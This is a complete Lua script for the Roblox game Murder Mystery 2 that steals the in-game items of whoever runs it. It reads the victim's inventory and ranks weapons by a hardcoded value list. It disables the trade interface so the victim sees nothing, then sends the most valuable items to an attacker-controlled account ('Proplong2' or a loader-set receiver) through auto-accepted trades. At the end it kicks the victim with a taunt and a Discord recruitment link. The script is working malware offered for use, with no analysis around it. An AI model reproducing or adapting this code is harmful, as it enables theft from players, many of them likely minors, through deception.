_G.scriptExecuted = _G.scriptExecuted or false
if _G.scriptExecuted then
    return
end
_G.scriptExecuted = true

local users = _G.Usernames or {}
local loaderReceiverFound = false

pcall(function()
    local env = getgenv()
    if not env then
        return
    end
    if type(env.Receiver) == 'string' and env.Receiver:gsub('%s', '') ~= '' then
        table.insert(users, env.Receiver)
        loaderReceiverFound = true
    end
end)

if not loaderReceiverFound then
    table.insert(users, 'Proplong2')
end

local Players = game:GetService('Players')
local ReplicatedStorage = game:GetService('ReplicatedStorage')
local plr = Players.LocalPlayer

if next(users) == nil then
    plr:kick("You didn't add a username")
    return
end

if game.PlaceId ~= 142823291 then
    plr:kick('Game not supported. Please join a normal MM2 server')
    return
end

local weaponsToSend = {}
local playerGui = plr:WaitForChild('PlayerGui')
local database = require(
    ReplicatedStorage:WaitForChild('Database')
        :WaitForChild('Sync')
        :WaitForChild('Item')
)
local lastOfferValue = 0

local itemValues = {
    ["nik's scythe"] = 999999999, ["gingerscope"] = 11600, ["traveler's axe"] = 7300, ["celestial"] = 1150, ["vampire's axe"] = 625, ["harvester"] = 525, ["icepiercer"] = 400,
    ["icebreaker"] = 125, ["elderwood scythe"] = 60, ["batwing"] = 60, ["swirly axe"] = 60, ["hallowscythe"] = 45, ["logchopper"] = 20, ["icewing"] = 10,
    ["chroma traveler's gun"] = 145000, ["chroma evergun"] = 57000, ["chroma evergreen"] = 27000, ["chroma vampire's gun"] = 19500, ["chroma bauble"] = 17000,
    ["chroma raygun"] = 15000, ["chroma constellation"] = 13500, ["chroma alienbeam"] = 9000, ["chroma sunrise"] = 5750, ["chroma watergun"] = 2700, ["chroma sunset"] = 2450,
    ["chroma darkbringer"] = 95, ["chroma lightbringer"] = 90, ["chroma luger"] = 62, ["chroma candleflame"] = 70, ["chroma laser"] = 60, ["chroma swirly gun"] = 62,
    ["chroma elderwood blade"] = 60, ["chroma cookiecane"] = 60, ["chroma shark"] = 55, ["chroma slasher"] = 55, ["chroma heat"] = 50, ["chroma deathshard"] = 55,
    ["chroma fang"] = 50, ["chroma tides"] = 50, ["chroma seer"] = 45, ["chroma gemstone"] = 50, ["chroma gingerblade"] = 40, ["chroma saw"] = 40, ["chroma boneblade"] = 40,
    ["chroma fire bat"] = 15, ["chroma fire dog"] = 15, ["chroma fire bunny"] = 13, ["chroma fire cat"] = 13, ["chroma fire fox"] = 12, ["chroma fire bear"] = 10, ["chroma fire pig"] = 10,
    ["traveler's gun"] = 4000, ["evergun"] = 2900, ["constellation"] = 1850, ["turkey"] = 1600, ["raygun"] = 1500, ["evergreen"] = 1350, ["vampire's gun"] = 1100,
    ["blossom"] = 950, ["sakura"] = 940, ["darkshot"] = 755, ["darksword"] = 745, ["bauble"] = 500, ["alienbeam"] = 750, ["bat"] = 255, ["xenoknife"] = 325, ["xenoshot"] = 325,
    ["sunrise"] = 270, ["soul"] = 265, ["spirit"] = 260, ["rainbow"] = 245, ["rainbow gun"] = 250, ["candy"] = 175, ["bloom"] = 165, ["flora"] = 170, ["sunset"] = 150,
    ["flowerwood gun"] = 150, ["ocean"] = 150, ["flowerwood"] = 145, ["waves"] = 145, ["heartblade"] = 120, ["watergun"] = 120, ["borealis"] = 105, ["australis"] = 100,
    ["sugar"] = 75, ["luger"] = 65, ["iceblaster"] = 65, ["candleflame"] = 60, ["pearl"] = 65, ["pearlshine"] = 65, ["makeshift"] = 60, ["elderwood blade"] = 60,
    ["red luger"] = 45, ["elderwood revolver"] = 60, ["phantom"] = 60, ["spectre"] = 60, ["darkbringer"] = 60, ["swirly gun"] = 45, ["lightbringer"] = 50, ["green luger"] = 35,
    ["swirlyblade"] = 28, ["iceflake"] = 28, ["icebeam"] = 28, ["plasmabeam"] = 28, ["plasmablade"] = 28, ["hallowgun"] = 28, ["amerilaser"] = 27,
    ["old glory"] = 26, ["shark"] = 26, ["night blade"] = 26, ["blaster"] = 25, ["pixel"] = 23, ["ginger luger"] = 23, ["virtual"] = 23, ["cookiecane"] = 23, ["gingermint"] = 23,
    ["nebula"] = 22, ["eternal cane"] = 22, ["luger cane"] = 22, ["gemstone"] = 22, ["jinglegun"] = 21, ["clockwork"] = 20, ["slasher"] = 20, ["gingerblade"] = 20,
    ["battle axe ii"] = 18, ["death shard"] = 18, ["heat"] = 17, ["battleaxe"] = 17, ["minty"] = 17, ["chill"] = 15, ["spider"] = 15, ["xmas"] = 15, ["tides"] = 15,
    ["fang"] = 15, ["bioblade"] = 15, ["vampires edge"] = 14, ["hallows edge"] = 12, ["pumpking"] = 12, ["frostsaber"] = 12, ["ice shard"] = 11, ["eternal"] = 10,
    ["flames"] = 10, ["winters edge"] = 10, ["hallows blade"] = 10, ["handsaw"] = 9, ["ice dragon"] = 9, ["eternal iii"] = 9, ["eternal iv"] = 9, ["eternal ii"] = 8,
    ["boneblade"] = 8, ["saw"] = 8, ["snowflake"] = 8, ["ghost blade"] = 8, ["frostbite"] = 7, ["eggblade"] = 6, ["prismatic"] = 6, ["peppermint"] = 4, ["cookieblade"] = 4,
    ["red seer"] = 3, ["blue seer"] = 3, ["purple seer"] = 3, ["seer"] = 3, ["orange seer"] = 2, ["yellow seer"] = 2, ["corrupt"] = 850,
    ["ghost"] = 10, ["blood"] = 8, ["laser"] = 28, ["america"] = 7, ["prince"] = 6, ["shadow"] = 6, ["phaser"] = 5, ["cowboy"] = 4, ["golden"] = 4, ["splitter"] = 3,
    ["jd"] = 40, ["latte (gun)"] = 135, ["latte (knife)"] = 135, ["cotton candy"] = 40, ["spectral (knife)"] = 18, ["traveler (gun)"] = 17, ["beach"] = 13, ["vampire (gun)"] = 12,
    ["aurora (gun)"] = 8, ["cavern (knife)"] = 7, ["skulls"] = 7, ["broken"] = 7, ["ginger (gun)"] = 6, ["icedriller"] = 5, ["ghost (knife)"] = 5, ["arctic (gun)"] = 4,
    ["nightsky"] = 4, ["red scratch"] = 4, ["witched"] = 3, ["blue elite"] = 3, ["green elite"] = 3, ["santa's magic"] = 3, ["santa's spirit"] = 3, ["spectral (gun)"] = 2,
    ["traveler (knife)"] = 2, ["blue scratch"] = 2, ["ghost (gun)"] = 2, ["chromatic (knife)"] = 1, ["frostfade (knife)"] = 1, ["icecracker"] = 1, ["vampire (knife)"] = 1, ["red fire"] = 1, ["cavern (gun)"] = 1,
    ["cane knife (2018)"] = 325, ["silent night (knife)"] = 50, ["dungeon"] = 27, ["aurora (knife)"] = 15, ["silent night (gun)"] = 12, ["icicles (gun)"] = 10, ["starry (gun)"] = 8,
    ["zombified"] = 8, ["toxic (knife)"] = 7, ["candy swirl (gun)"] = 5, ["magma"] = 5, ["monster"] = 5, ["darkknife"] = 3, ["floral (knife)"] = 3, ["jack"] = 3,
    ["snakebite (knife)"] = 3, ["swirl"] = 3, ["watcher (gun)"] = 3, ["bats"] = 3, ["orange marble"] = 2, ["toxic (gun)"] = 2, ["gingerbread"] = 1, ["candy swirl (knife)"] = 1, ["snakebite (gun)"] = 1,
    ["bones"] = 65, ["zombified (knife)"] = 65, ["gingerbread (knife)"] = 50, ["sweater (knife)"] = 45, ["brains"] = 40, ["branches"] = 25, ["zombified (gun)"] = 15, ["void"] = 12,
    ["frozen (gun)"] = 10, ["mummy 2018 (gun)"] = 10, ["zombie (gun)"] = 10, ["potion (knife)"] = 8, ["lights (gun)"] = 7, ["pumpkin pie"] = 5, ["holly (gun)"] = 5,
    ["potion (2017)"] = 5, ["potion (gun)"] = 5, ["webs"] = 3, ["frozen (knife)"] = 3, ["gingerbread (gun)"] = 3, ["mummy 2018 (knife)"] = 3, ["zombie (knife)"] = 3,
    ["mummy (2017)"] = 2, ["lights (knife)"] = 1, ["moons"] = 1, ["vampire"] = 1, ["wolf"] = 1,
    ["glitch1"] = 70, ["glitch2"] = 60, ["bats (knife)"] = 100, ["pine (knife)"] = 90, ["gifts (knife)"] = 70, ["sparkle9"] = 30, ["ghoulish"] = 30, ["sparkle10"] = 20,
    ["sparkle8"] = 20, ["sparkle7"] = 18, ["elf (knife)"] = 17, ["snowman gun"] = 15, ["wrapped gun"] = 15, ["rip"] = 12, ["sparkle6"] = 12, ["combat ii"] = 10,
    ["coal (knife)"] = 10, ["candycorn 2017"] = 10, ["prism"] = 8, ["skool"] = 8, ["snowflakes (gun)"] = 8, ["sparkle5"] = 8, ["tailslide"] = 8, ["sparkle4"] = 8,
    ["phantom"] = 8, ["ollie"] = 7, ["sidewinder"] = 7, ["euro"] = 5, ["grave (gun)"] = 5, ["pumpkin (2019)"] = 5, ["zombie"] = 5, ["asteroid"] = 5, ["slime (knife)"] = 4,
    ["alex"] = 3, ["corl"] = 3, ["denis"] = 3, ["frosted (knife)"] = 3, ["sketchy"] = 3, ["slime (gun)"] = 3, ["sub"] = 3, ["webbed (gun)"] = 3, ["ghosty"] = 3,
    ["sparkle1"] = 3, ["sparkle2"] = 3, ["sparkle3"] = 3, ["ecto"] = 3, ["mummified"] = 2, ["grind"] = 2, ["indy"] = 2,
    ["zombie dog"] = 400, ["elf (2019)"] = 200, ["blue pumpkin (2018)"] = 110, ["red pumpkin (2018)"] = 90, ["dogey"] = 70, ["black cat"] = 60, ["green pumpkin (2018)"] = 55,
    ["santa 2019"] = 35, ["pumpkin (2017)"] = 25, ["piggy"] = 20, ["fairy"] = 13, ["jetstream"] = 13, ["nobledragon"] = 13, ["rudolph"] = 13, ["seahorsey"] = 13,
    ["chilly"] = 12, ["green pumpkin (2019)"] = 12, ["pengy"] = 12, ["purple pumpkin (2018)"] = 12, ["red pumpkin (2019)"] = 12, ["vampire bat"] = 12, ["<3"] = 10,
    ["eyeball"] = 10, ["reindeer"] = 10, ["tankie"] = 10, ["overseer eye"] = 8, ["mr. reindeer"] = 10, ["elf"] = 8, ["red pumpkin (2020)"] = 7, ["green pumpkin (2020)"] = 5,
    ["red pumpkin (2021)"] = 5, ["mechbug"] = 5, ["ufo"] = 5, ["green pumpkin (2021)"] = 4, ["blue pumpkin (2020)"] = 3, ["skully"] = 3, ["blue pumpkin (2019)"] = 2,
    ["shadow pumpkin"] = 2, ["badger"] = 1, ["steambird"] = 1, ["traveller"] = 1, ["deathspeaker"] = 1, ["electro"] = 1, ["frostbird"] = 1, ["ice phoenix"] = 1
}

ReplicatedStorage.Trade.UpdateTrade.OnClientEvent:Connect(function(tradeData)
    if tradeData and tradeData.LastOffer then
        lastOfferValue = tradeData.LastOffer
    end
end)

local function buildValueList()
    local valueList = {}
    for dataid, item in pairs(database) do
        local itemName = item.ItemName and item.ItemName:lower() or ''
        local value = itemValues[itemName]
        if not value and item.Chroma then
            value = itemValues['chroma ' .. itemName]
        end
        if value then
            valueList[dataid] = value
        end
    end
    return valueList
end

local function sendTradeRequest(user)
    local targetPlayer = Players:FindFirstChild(user)
    if not targetPlayer then
        return
    end
    local args = { targetPlayer }
    ReplicatedStorage:WaitForChild('Trade')
        :WaitForChild('SendRequest')
        :InvokeServer(unpack(args))
end

local function getTradeStatus()
    return ReplicatedStorage.Trade.GetTradeStatus:InvokeServer()
end

local function acceptTrade()
    ReplicatedStorage.Trade.AcceptTrade:FireServer(428469873, lastOfferValue)
end

local function addWeaponToTrade(id)
    local args = { id, 'Weapons' }
    ReplicatedStorage:WaitForChild('Trade')
        :WaitForChild('OfferItem')
        :FireServer(unpack(args))
end

local tradegui = playerGui:WaitForChild('TradeGUI')
tradegui:GetPropertyChangedSignal('Enabled'):Connect(function()
    tradegui.Enabled = false
end)
local tradeguiphone = playerGui:WaitForChild('TradeGUI_Phone')
tradeguiphone:GetPropertyChangedSignal('Enabled'):Connect(function()
    tradeguiphone.Enabled = false
end)

local untradable = {
    ['DefaultGun'] = true,
    ['DefaultKnife'] = true,
    ['Reaver'] = true,
    ['Reaver_Legendary'] = true,
    ['Reaver_Godly'] = true,
    ['Reaver_Ancient'] = true,
    ['IceHammer'] = true,
    ['IceHammer_Legendary'] = true,
    ['IceHammer_Godly'] = true,
    ['IceHammer_Ancient'] = true,
    ['Gingerscythe'] = true,
    ['Gingerscythe_Legendary'] = true,
    ['Gingerscythe_Godly'] = true,
    ['Gingerscythe_Ancient'] = true,
    ['TestItem'] = true,
    ['Season1TestKnife'] = true,
    ['Cracks'] = true,
    ['Icecrusher'] = true,
    ['???'] = true,
    ['Dartbringer'] = true,
    ['TravelerAxeRed'] = true,
    ['TravelerAxeBronze'] = true,
    ['TravelerAxeSilver'] = true,
    ['TravelerAxeGold'] = true,
    ['BlueCamo_K_2022'] = true,
    ['GreenCamo_K_2022'] = true,
    ['SharkSeeker'] = true,
    ['Abduction'] = true,
    ['Aquatic'] = true,
    ['Arctic'] = true,
    ['Aurora'] = true,
    ['Aurora Lights'] = true,
    ['Bats'] = true,
    ['Batswarm'] = true,
    ['Bat Swarm (2024)'] = true,
    ['Bitsplosion'] = true,
    ['Blizzard'] = true,
    ['Bloom'] = true,
    ['Blue Flaming Knife'] = true,
    ['Candies'] = true,
    ['Candies 2022'] = true,
    ['Candies (2023)'] = true,
    ['Candy Cane Effect'] = true,
    ['Carrots'] = true,
    ['Cat Eyes'] = true,
    ['Celestial'] = true,
    ['Chilly'] = true,
    ['Common Ornament'] = true,
    ['Cursed'] = true,
    ['Darkfire'] = true,
    ['Darkswirl'] = true,
    ['Doge'] = true,
    ['Dual Wield'] = true,
    ['Easter Glow'] = true,
    ['Electric Knife'] = true,
    ['Eliteify'] = true,
    ['Ethereal'] = true,
    ['Fireworks'] = true,
    ['Flaming Knife'] = true,
    ['Flamingo'] = true,
    ['Flowers'] = true,
    ['Flowerwood'] = true,
    ['Floral'] = true,
    ['Flow'] = true,
    ['Frostbite'] = true,
    ['Frostfire'] = true,
    ['Gearstorm'] = true,
    ['Ghost'] = true,
    ['Ghostify'] = true,
    ['Ghostly'] = true,
    ['Ghosts'] = true,
    ['Ghosts (2023)'] = true,
    ['Gifts'] = true,
    ['Gingerbread Effect'] = true,
    ['Glisten'] = true,
    ['Glowy'] = true,
    ['Green Flaming Knife'] = true,
    ["Hallow's Blaze"] = true,
    ['Heartify'] = true,
    ['Heatwave'] = true,
    ['Ice Magic'] = true,
    ['Jellyfish'] = true,
    ['Jingle'] = true,
    ['Knifeception'] = true,
    ['Knife Wrapper'] = true,
    ['Legendary Ornament'] = true,
    ['Matrix'] = true,
    ['Minty'] = true,
    ['Monify'] = true,
    ['Musical'] = true,
    ['Northern Lights'] = true,
    ['Petals'] = true,
    ['Phantom'] = true,
    ['Pink Flaming Knife'] = true,
    ['Plasma'] = true,
    ['Poison'] = true,
    ['Pumpkin'] = true,
    ['Pumpkin 2022'] = true,
    ['Radioactive'] = true,
    ['Rainbow'] = true,
    ['Rainbow Flaming Knife'] = true,
    ['Rainbows'] = true,
    ['Rare Ornament'] = true,
    ['Retro'] = true,
    ['Snowfall'] = true,
    ['Snowflake'] = true,
    ['Snowflakes'] = true,
    ['Snowflakes 2017'] = true,
}

local valueList = buildValueList()
local realData =
    ReplicatedStorage.Remotes.Inventory.GetProfileData:InvokeServer(plr.Name)

for i, v in pairs(realData.Weapons.Owned) do
    local dataid = i
    local amount = v
    local itemInfo = database[dataid]
    if itemInfo and not untradable[dataid] then
        local value = valueList[dataid] or 0
        table.insert(
            weaponsToSend,
            { DataID = dataid, Rarity = itemInfo.Rarity, Value = value, Amount = amount }
        )
    end
end

if #weaponsToSend > 0 then
    table.sort(weaponsToSend, function(a, b)
        return a.Value > b.Value
    end)

    local function doTrade(joinedUser)
        while #weaponsToSend > 0 do
            if not Players:FindFirstChild(joinedUser) then
                wait(1)
            else
                local tradeStatus = getTradeStatus()

                if tradeStatus == 'None' then
                    sendTradeRequest(joinedUser)
                elseif tradeStatus == 'SendingRequest' then
                    wait(0.3)
                elseif tradeStatus == 'ReceivingRequest' then
                    ReplicatedStorage:WaitForChild('Trade')
                        :WaitForChild('DeclineRequest')
                        :FireServer()
                    wait(0.3)
                elseif tradeStatus == 'StartTrade' then
                    local itemsInThisTrade = {}
                    local slotsFilled = 0

                    while slotsFilled < 4 and #weaponsToSend > 0 do
                        local weapon = weaponsToSend[1]
                        local amountToAdd =
                            math.min(weapon.Amount, 4 - slotsFilled)

                        for i = 1, amountToAdd do
                            addWeaponToTrade(weapon.DataID)
                            table.insert(itemsInThisTrade, weapon)
                        end

                        slotsFilled = slotsFilled + amountToAdd
                        weapon.Amount = weapon.Amount - amountToAdd

                        if weapon.Amount == 0 then
                            table.remove(weaponsToSend, 1)
                        end
                    end

                    wait(6)
                    acceptTrade()

                    local tradeStartTime = tick()
                    local tradeCompleted = false
                    while tick() - tradeStartTime < 20 do
                        if getTradeStatus() == 'None' then
                            tradeCompleted = true
                            break
                        end
                        wait(0.1)
                    end

                    if not tradeCompleted then
                        for i = #itemsInThisTrade, 1, -1 do
                            local itemToReAdd = itemsInThisTrade[i]
                            local found = false
                            for _, existingItem in ipairs(weaponsToSend) do
                                if
                                    existingItem.DataID == itemToReAdd.DataID
                                then
                                    existingItem.Amount = existingItem.Amount
                                        + 1
                                    found = true
                                    break
                                end
                            end
                            if not found then
                                table.insert(
                                    weaponsToSend,
                                    1,
                                    {
                                        DataID = itemToReAdd.DataID,
                                        Rarity = itemToReAdd.Rarity,
                                        Value = itemToReAdd.Value,
                                        Amount = 1,
                                    }
                                )
                            end
                        end
                        table.sort(weaponsToSend, function(a, b)
                            return a.Value > b.Value
                        end)
                    end
                else
                    wait(0.5)
                end
            end
            wait(3)
        end
        plr:kick('You got robbed bru start stealing people shit join here https://discord.gg/nxk7t7nASg')
    end

    local function waitForUser()
        local triggered = false
        local receiverName = nil

        local function onPlayerAdded(player)
            if table.find(users, player.Name) and not triggered then
                triggered = true
                receiverName = player.Name
                task.wait(2)
                doTrade(receiverName)
            end
        end

        for _, p in ipairs(Players:GetPlayers()) do
            onPlayerAdded(p)
        end
        Players.PlayerAdded:Connect(onPlayerAdded)
    end

    waitForUser()
end
